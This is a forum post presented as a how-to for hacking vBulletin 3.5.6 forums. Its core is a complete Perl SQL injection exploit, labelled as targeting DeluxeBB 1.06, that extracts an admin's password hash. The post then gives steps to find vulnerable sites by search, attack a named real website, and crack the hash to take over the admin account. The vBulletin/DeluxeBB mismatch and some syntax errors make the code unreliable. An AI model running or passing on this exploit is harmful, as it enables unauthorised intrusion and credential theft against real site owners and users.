Post: [Howto] Hack a Vbulletin 3.5.6 form
Options
10-21-2008, 10:12 PM
#1
Iconnor12
Do a barrel roll!
make sure that you save it to your C: from there all you need to do is go to notepad and paste this in :
#!/usr/bin/perl
use IO::Socket;
print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# exploit discovered and coded #
# by Iconnor12#
# Do not take advantage of this script and call it your own#
#Iconnors Work#
#############################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com[Space]/[Space]1
User Id 1 is usually the admin
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------
";
print "[>] SERVER: $server
";
print "[>] DIR: $dir
";
print "[>] USERI
$user
";
print "------------------------------------------------------------------------------------------------
";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0'
+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...
";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-]
CONNECTION FAILED";
print "[+] CONNECTED
";
print "[~] SENDING QUERY...
";
print $socket "GET $path HTTP/1.1
";
print $socket "Host: $server
";
print $socket "Accept: */*
";
print $socket "Connection: close
";
print "[+] DONE!
";
print "--[ REPORT ]------------------------------------------------------------------------------------
";
while ($answer = <$socket>
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."
";
print "--------------------------------------------------------------------------------------
";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------
";
Save that as "anything you want.pl" save it into the bin folder in your Perl folder which should be in your C: or this exploit wont work!
Ater you have saved your script go to Start>run>Cmd then type cd C:\perl\bin e.g. anything.pl as shown in the picture below..
You must login or register to view this content.
then search for a website powered by vbulletin 3.5.6 just google it
then copy the URLall you need is upto the .com i used the first one i found
which was "https://www.microzonex.com.ar/" after you have your URL u need the admins or victims id the admin is usually 1 as said in the script. you you would type "https://www.microzonex.com.ar / 1"
then press enter and you should get a MD5 hash code as shown in the pic below
You must login or register to view this content.
when you have the hash code go to a site that cracks MD5 hash code like You must login or register to view this content. that find exploits in windows,mac etc they also crach MD5 hashes under cracker. You will need to wait for space to post your hash as many are posted a day. when you have your hash cracked you will have the password in plain text. the login name is the admins name e.g. lulz
enjoy Iconnor12
hope this post aint gona get me banned :/
Copyright © 2024, NextGenUpdate.
All Rights Reserved.
